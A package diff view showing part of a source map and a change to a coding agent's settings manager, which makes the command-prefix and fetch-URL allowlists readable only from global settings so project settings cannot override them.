zC;;;;GAIG;AACH,MAAM,MAAM,aAAa,GACtB,MAAM,GACN;IACA,MAAM,EAAE,MAAM,CAAC;IACf,UAAU,CAAC,EAAE,MAAM,EAAE,CAAC;IACtB,MAAM,CAAC,EAAE,MAAM,EAAE,CAAC;IAClB,OAAO,CAAC,EAAE,MAAM,EAAE,CAAC;IACnB,MAAM,CAAC,EAAE,MAAM,EAAE,CAAC;CACjB,CAAC;AAEL,MAAM,WAAW,QAAQ;IACxB,oBAAoB,CAAC,EAAE,MAAM,CAAC;IAC9B,eAAe,CAAC,EAAE,MAAM,CAAC;IACzB,YAAY,CAAC,EAAE,MAAM,CAAC;IACtB,oBAAoB,CAAC,EAAE,KAAK,GAAG,SAAS,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,OAAO,CAAC;IAC/E,SAAS,CAAC,EAAE,gBAAgB,CAAC;IAC7B,YAAY,CAAC,EAAE,KAAK,GAAG,eAAe,CAAC;IACvC,YAAY,CAAC,EAAE,KAAK,GAAG,eAAe,CAAC;IACvC,KAAK,CAAC,EAAE,MAAM,CAAC;IACf,UAAU,CAAC,EAAE,kBAAkB,CAAC;IAChC,aAAa,CAAC,EAAE,qBAAqB,CAAC;IACtC,KAAK,CAAC,EAAE,aAAa,CAAC;IACtB,iBAAiB,CAAC,EAAE,OAAO,CAAC;IAC5B,SAAS,CAAC,EAAE,MAAM,CAAC;IACnB,YAAY,CAAC,EAAE,OAAO,CAAC;IACvB,kBAAkB,CAAC,EAAE,MAAM,CAAC;IAC5B,iBAAiB,CAAC,EAAE,OAAO,CAAC;IAC5B,QAAQ,CAAC,EAAE,aAAa,EAAE,CAAC;IAC3B,UAAU,CAAC,EAAE,MAAM,EAAE,CAAC;IACtB,MAAM,CAAC,EAAE,MAAM,EAAE,CAAC;IAClB,OAAO,CAAC,EAAE,MAAM,EAAE,CAAC;IACnB,MAAM,CAAC,EAAE,MAAM,EAAE,CAAC;IAClB,mBAAmB,CAAC,EAAE,OAAO,CAAC;IAC9B,QAAQ,CAAC,EAAE,gBAAgB,CAAC;IAC5B,MAAM,CAAC,EAAE,aAAa,CAAC;IACvB,aAAa,CAAC,EAAE,MAAM,EAAE,CAAC;IACzB,kBAAkB,CAAC,EAAE,MAAM,GAAG,MAAM,GAAG,MAAM,CAAC;IAC9C,cAAc,CAAC,EAAE,SAAS,GAAG,UAAU,GAAG,WAAW,GAAG,cAAc,GAAG,KAAK,CAAC;IAC/E,eAAe,CAAC,EAAE,uBAAuB,CAAC;IAC1C,cAAc,CAAC,EAAE,MAAM,CAAC;IACxB,sBAAsB,CAAC,EAAE,MAAM,CAAC;IAChC,wBAAwB,CAAC,EAAE,OAAO,CAAC;IACnC,iBAAiB,CAAC,EAAE,MAAM,EAAE,CAAC;IAC7B,kBAAkB,CAAC,EAAE,OAAO,CAAC;IAC7B,QAAQ,CAAC,EAAE,gBAAgB,CAAC;IAC5B,MAAM,CAAC,EAAE,cAAc,CAAC;IACxB,KAAK,CAAC,EAAE,aAAa,CAAC;IACtB,eAAe,CAAC,EAAE,uBAAuB,CAAC;IAC1C,aAAa,CAAC,EAAE,qBAAqB,CAAC;IACtC,QAAQ,CAAC,EAAE,gBAAgB,CAAC;IAC5B,cAAc,CAAC,EAAE,sBAAsB,CAAC;IACxC,QAAQ,CAAC,EAAE,UAAU,GAAG,UAAU,CAAC;IACnC,eAAe,CAAC,EAAE,eAAe,GAAG,cAAc,CAAC;IACnD,sBAAsB,CAAC,EAAE,MAAM,EAAE,CAAC;IAClC,gBAAgB,CAAC,EAAE,MAAM,EAAE,CAAC;CAC5B;AAgDD,MAAM,MAAM,aAAa,GAAG,QAAQ,GAAG,SAAS,CAAC;AAEjD,MAAM,WAAW,eAAe;IAC/B,QAAQ,CAAC,KAAK,EAAE,aAAa,EAAE,EAAE,EAAE,CAAC,OAAO,EAAE,MAAM,GAAG,SAAS,KAAK,MAAM,GAAG,SAAS,GAAG,IAAI,CAAC;CAC9F;AAED,MAAM,WAAW,aAAa;IAC7B,KAAK,EAAE,aAAa,CAAC;IACrB,KAAK,EAAE,KAAK,CAAC;CACb;AAsFD,qBAAa,eAAe;IAC3B,OAAO,CAAC,OAAO,CAAkB;IACjC,OAAO,CAAC,cAAc,CAAW;IACjC,OAAO,CAAC,eAAe,CAAW;IAClC,OAAO,CAAC,QAAQ,CAAW;IAC3B,OAAO,CAAC,cAAc,CAA6B;IACnD,OAAO,CAAC,oBAAoB,CAA0C;IACtE,OAAO,CAAC,qBAAqB,CAA6B;IAC1D,OAAO,CAAC,2BAA2B,CAA0C;IAC7E,OAAO,CAAC,uBAAuB,CAAsB;IACrD,OAAO,CAAC,wBAAwB,CAAsB;IACtD,OAAO,CAAC,UAAU,CAAoC;IACtD,OAAO,CAAC,MAAM,CAAkB;IAEhC,OAAO;IAiBP,qDAAqD;IACrD,MAAM,CAAC,MAAM,CAAC,GAAG,GAAE,MAAsB,EAAE,QAAQ,GAAE,MAAsB,GAAG,eAAe;IAK7F,iEAAiE;IACjE,MAAM,CAAC,WAAW,CAAC,OAAO,EAAE,eAAe,GAAG,eAAe;IAqB7D,wDAAwD;IACxD,MAAM,CAAC,QAAQ,CAAC,QAAQ,GAAE,OAAO,CAAC,QAAQ,CAAM,GAAG,eAAe;IAKlE,OAAO,CAAC,MAAM,CAAC,eAAe;IAc9B,OAAO,CAAC,MAAM,CAAC,kBAAkB;IAWjC,gDAAgD;IAChD,OAAO,CAAC,MAAM,CAAC,eAAe;IAqC9B,iBAAiB,IAAI,QAAQ;IAI7B,kBAAkB,IAAI,QAAQ;IAI9B,yBAAyB,IAAI,OAAO;IAIpC,uBAAuB,IAAI,mBAAmB,EAAE,GAAG,SAAS;IAI5D,MAAM,IAAI,IAAI;IA2Bd,4DAA4D;IAC5D,cAAc,CAAC,SAAS,EAAE,OAAO,CAAC,QAAQ,CAAC,GAAG,IAAI;IAIlD,0DAA0D;IAC1D,OAAO,CAAC,YAAY;IAUpB,2DAA2D;IAC3D,OAAO,CAAC,mBAAmB;IAU3B,OAAO,CAAC,WAAW;IAKnB;;;;OAIG;IACH,OAAO,CAAC,kBAAkB;IAK1B,OAAO,CAAC,kBAAkB;IAW1B,OAAO,CAAC,YAAY;IAWpB,OAAO,CAAC,yBAAyB;IAQjC,OAAO,CAAC,qBAAqB;IA+B7B,OAAO,CAAC,IAAI;IAgBZ,OAAO,CAAC,mBAAmB;IAgBrB,KAAK,IAAI,OAAO,CAAC,IAAI,CAAC;IAI5B,WAAW,IAAI,aAAa,EAAE;IAQ9B,qEAAqE;IACrE,OAAO,CAAC,gBAAgB;IAMxB,mFAAmF;IACnF,OAAO,CAAC,gBAAgB;IAUxB,oFAAoF;IACpF,OAAO,CAAC,sBAAsB;IAa9B,yEAAyE;IACzE,OAAO,CAAC,iBAAiB;IASzB,uBAAuB,IAAI,MAAM,GAAG,SAAS;IAI7C,uBAAuB,CAAC,OAAO,EAAE,MAAM,GAAG,IAAI;IAI9C,kBAAkB,IAAI,MAAM,GAAG,SAAS;IAIxC,eAAe,IAAI,MAAM,GAAG,SAAS;IAIrC,kBAAkB,CAAC,QAAQ,EAAE,MAAM,GAAG,IAAI;IAI1C,eAAe,CAAC,OAAO,EAAE,MAAM,GAAG,IAAI;IAItC,0BAA0B,CAAC,QAAQ,EAAE,MAAM,EAAE,OAAO,EAAE,MAAM,GAAG,IAAI;IAgBnE,eAAe,IAAI,KAAK,GAAG,eAAe;IAI1C,eAAe,CAAC,IAAI,EAAE,KAAK,GAAG,eAAe,GAAG,IAAI;IAIpD,eAAe,IAAI,KAAK,GAAG,eAAe;IAI1C,eAAe,CAAC,IAAI,EAAE,KAAK,GAAG,eAAe,GAAG,IAAI;IAIpD,QAAQ,IAAI,MAAM,GAAG,SAAS;IAI9B,QAAQ,CAAC,KAAK,EAAE,MAAM,GAAG,IAAI;IAI7B,uBAAuB,IAAI,KAAK,GAAG,SAAS,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,OAAO,GAAG,SAAS;IAI9F,uBAAuB,CAAC,KAAK,EAAE,KAAK,GAAG,SAAS,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,OAAO,GAAG,IAAI;IAI7F,YAAY,IAAI,gBAAgB;IAIhC,YAAY,CAAC,SAAS,EAAE,gBAAgB,GAAG,IAAI;IAI/C,oBAAoB,IAAI,OAAO;IAI/B,oBAAoB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAI5C,0BAA0B,IAAI,MAAM;IAIpC,6BAA6B,IAAI,MAAM;IAIvC,qBAAqB,IAAI;QAAE,OAAO,EAAE,OAAO,CAAC;QAAC,aAAa,EAAE,MAAM,CAAC;QAAC,gBAAgB,EAAE,MAAM,CAAA;KAAE;IAQ9F,wBAAwB,IAAI;QAAE,aAAa,EAAE,MAAM,CAAC;QAAC,UAAU,EAAE,OAAO,CAAA;KAAE;IAO1E,0BAA0B,IAAI,OAAO;IAIrC,eAAe,IAAI,OAAO;IAI1B,eAAe,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAIvC,gBAAgB,IAAI;QAAE,OAAO,EAAE,OAAO,CAAC;QAAC,UAAU,EAAE,MAAM,CAAC;QAAC,WAAW,EAAE,MAAM,CAAC;QAAC,UAAU,EAAE,MAAM,CAAA;KAAE;IASrG,oBAAoB,IAAI,OAAO;IAI/B,oBAAoB,CAAC,IAAI,EAAE,OAAO,GAAG,IAAI;IAIzC,YAAY,IAAI,MAAM,GAAG,SAAS;IAIlC,YAAY,CAAC,IAAI,EAAE,MAAM,GAAG,SAAS,GAAG,IAAI;IAI5C,eAAe,IAAI,OAAO;IAI1B,eAAe,CAAC,KAAK,EAAE,OAAO,GAAG,IAAI;IAIrC,qBAAqB,IAAI,MAAM,GAAG,SAAS;IAI3C,qBAAqB,CAAC,MAAM,EAAE,MAAM,GAAG,SAAS,GAAG,IAAI;IAIvD,oBAAoB,IAAI,OAAO;IAI/B,oBAAoB,CAAC,QAAQ,EAAE,OAAO,GAAG,IAAI;IAI7C,WAAW,IAAI,aAAa,EAAE;IAI9B,WAAW,CAAC,QAAQ,EAAE,aAAa,EAAE,GAAG,IAAI;IAI5C,kBAAkB,CAAC,QAAQ,EAAE,aAAa,EAAE,GAAG,IAAI;IAInD,iBAAiB,IAAI,MAAM,EAAE;IAI7B,iBAAiB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAIxC,wBAAwB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAI/C,aAAa,IAAI,MAAM,EAAE;IAIzB,aAAa,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAIpC,oBAAoB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAI3C,sBAAsB,IAAI,MAAM,EAAE;IAIlC,sBAAsB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAI7C,6BAA6B,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAIpD,aAAa,IAAI,MAAM,EAAE;IAIzB,aAAa,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAIpC,oBAAoB,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAI3C,sBAAsB,IAAI,OAAO;IAIjC,sBAAsB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAI9C,kBAAkB,IAAI,uBAAuB,GAAG,SAAS;IAIzD,aAAa,IAAI,OAAO;IAIxB,aAAa,CAAC,IAAI,EAAE,OAAO,GAAG,IAAI;IAIlC,gBAAgB,IAAI,OAAO;IAQ3B,gBAAgB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAIxC,kBAAkB,IAAI,OAAO;IAI7B,kBAAkB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAI1C,cAAc,IAAI,OAAO;IAIzB,cAAc,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAItC,gBAAgB,IAAI,MAAM,EAAE,GAAG,SAAS;IAIxC,gBAAgB,CAAC,QAAQ,EAAE,MAAM,EAAE,GAAG,SAAS,GAAG,IAAI;IAItD,qBAAqB,IAAI,MAAM,GAAG,MAAM,GAAG,MAAM;IAIjD,qBAAqB,CAAC,MAAM,EAAE,MAAM,GAAG,MAAM,GAAG,MAAM,GAAG,IAAI;IAI7D,iBAAiB,IAAI,SAAS,GAAG,UAAU,GAAG,WAAW,GAAG,cAAc,GAAG,KAAK;IAMlF,iBAAiB,CAAC,IAAI,EAAE,SAAS,GAAG,UAAU,GAAG,WAAW,GAAG,cAAc,GAAG,KAAK,GAAG,IAAI;IAI5F,qBAAqB,IAAI,OAAO;IAIhC,qBAAqB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAI7C,iBAAiB,IAAI,MAAM;IAI3B,iBAAiB,CAAC,OAAO,EAAE,MAAM,GAAG,IAAI;IAIxC,yBAAyB,IAAI,MAAM;IAInC,yBAAyB,CAAC,UAAU,EAAE,MAAM,GAAG,IAAI;IAInD,2BAA2B,IAAI,OAAO;IAItC,2BAA2B,CAAC,KAAK,EAAE,OAAO,GAAG,IAAI;IAIjD,oBAAoB,IAAI,MAAM,EAAE;IAIhC,oBAAoB,CAAC,IAAI,EAAE,MAAM,EAAE,GAAG,IAAI;IAI1C,kBAAkB,IAAI,MAAM;IAI5B,iBAAiB,IAAI;QACpB,OAAO,EAAE,OAAO,CAAC;QACjB,qBAAqB,EAAE,MAAM,CAAC;QAC9B,iBAAiB,EAAE,MAAM,CAAC;QAC1B,mBAAmB,EAAE,MAAM,CAAC;QAC5B,iBAAiB,EAAE,MAAM,CAAC;QAC1B,0BAA0B,EAAE,MAAM,CAAC;KACnC;IAWD,eAAe,IAAI,OAAO;IAI1B,eAAe,IAAI,MAAM;IAIzB,oBAAoB,IAAI,MAAM,GAAG,UAAU,GAAG,cAAc;IAI5D,qBAAqB,IAAI,OAAO,GAAG,QAAQ;IAI3C,kBAAkB,IAAI,OAAO;IAI7B,kBAAkB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAI1C,iBAAiB,IAAI,MAAM,CAAC,MAAM,EAAE,kBAAkB,EAAE,CAAC;IAIzD,gBAAgB,CAAC,IAAI,EAAE,MAAM,GAAG,kBAAkB,EAAE,GAAG,SAAS;IAIhE,gBAAgB,CAAC,IAAI,EAAE,MAAM,EAAE,OAAO,EAAE,kBAAkB,EAAE,GAAG,IAAI;IAanE,mBAAmB,CAAC,IAAI,EAAE,MAAM,GAAG,OAAO;IAa1C,mBAAmB,IAAI;QAAE,OAAO,EAAE,OAAO,CAAC;QAAC,MAAM,EAAE,MAAM,CAAC,MAAM,EAAE,kBAAkB,EAAE,CAAC,CAAA;KAAE;IAOzF,yBAAyB,IAAI,sBAAsB;IAInD,wBAAwB,CAAC,OAAO,EAAE,OAAO,GAAG,IAAI;IAIhD,WAAW,IAAI,UAAU,GAAG,UAAU;IAItC,WAAW,CAAC,IAAI,EAAE,UAAU,GAAG,UAAU,GAAG,IAAI;IAIhD,kBAAkB,IAAI,eAAe,GAAG,cAAc;IAItD,kBAAkB,CAAC,MAAM,EAAE,eAAe,GAAG,cAAc,GAAG,IAAI;IAIlE;;;OAGG;IACH,yBAAyB,IAAI,MAAM,EAAE,GAAG,SAAS;IAIjD,yBAAyB,CAAC,QAAQ,EAAE,MAAM,EAAE,GAAG,IAAI;IAInD;;;OAGG;IACH,mBAAmB,IAAI,MAAM,EAAE,GAAG,SAAS;IAI3C,mBAAmB,CAAC,IAAI,EAAE,MAAM,EAAE,GAAG,IAAI;CAGzC"}

package/packages/pi-coding-agent/dist/core/settings-manager.js CHANGED Viewed

@@ -3,6 +3,19 @@ import { dirname, join } from "path";
 import lockfile from "proper-lockfile";
 import { CONFIG_DIR_NAME, getAgentDir } from "../config.js";
 import { COMPACTION_KEEP_RECENT_TOKENS, COMPACTION_RESERVE_TOKENS, RETRY_BASE_DELAY_MS, RETRY_MAX_DELAY_MS, } from "./constants.js";
+/** Settings keys that are only respected from global config — project settings cannot override these. */
+const GLOBAL_ONLY_KEYS = new Set([
+    "allowedCommandPrefixes",
+    "fetchAllowedUrls",
+]);
+/** Remove global-only keys from a settings object. Applied once at load time. */
+function stripGlobalOnlyKeys(settings) {
+    const result = { ...settings };
+    for (const key of GLOBAL_ONLY_KEYS) {
+        delete result[key];
+    }
+    return result;
+}
 /** Deep merge settings: project/overrides take precedence, nested objects merge recursively */
 function deepMergeSettings(base, overrides) {
     const result = { ...base };
@@ -112,7 +125,7 @@ export class SettingsManager {
         this.writeQueue = Promise.resolve();
         this.storage = storage;
         this.globalSettings = initialGlobal;
-        this.projectSettings = initialProject;
+        this.projectSettings = stripGlobalOnlyKeys(initialProject);
         this.globalSettingsLoadError = globalLoadError;
         this.projectSettingsLoadError = projectLoadError;
         this.errors = [...initialErrors];
@@ -219,7 +232,7 @@ export class SettingsManager {
         this.modifiedProjectNestedFields.clear();
         const projectLoad = SettingsManager.tryLoadFromStorage(this.storage, "project");
         if (!projectLoad.error) {
-            this.projectSettings = projectLoad.settings;
+            this.projectSettings = stripGlobalOnlyKeys(projectLoad.settings);
             this.projectSettingsLoadError = null;
         }
         else {
@@ -329,7 +342,7 @@ export class SettingsManager {
         });
     }
     saveProjectSettings(settings) {
-        this.projectSettings = structuredClone(settings);
+        this.projectSettings = stripGlobalOnlyKeys(structuredClone(settings));
         this.settings = deepMergeSettings(this.globalSettings, this.projectSettings);
         if (this.projectSettingsLoadError) {
             return;
@@ -737,5 +750,25 @@ export class SettingsManager {
     setTimestampFormat(format) {
         this.setGlobalSetting("timestampFormat", format);
     }
+    /**
+     * Get the allowed command prefixes from global settings only.
+     * Returns undefined if not configured (caller should use built-in defaults).
+     */
+    getAllowedCommandPrefixes() {
+        return this.globalSettings.allowedCommandPrefixes;
+    }
+    setAllowedCommandPrefixes(prefixes) {
+        this.setGlobalSetting("allowedCommandPrefixes", prefixes);
+    }
+    /**
+     * Get the fetch URL allowlist from global settings only.
+     * Returns undefined if not configured (caller should use empty allowlist).
+     */
+    getFetchAllowedUrls() {
+        return this.globalSettings.fetchAllowedUrls;
+    }
+    setFetchAllowedUrls(urls) {
+        this.setGlobalSetting("fetchAllowedUrls", urls);
+    }
 }
 //# sourceMappingURL=settings-manager.js.map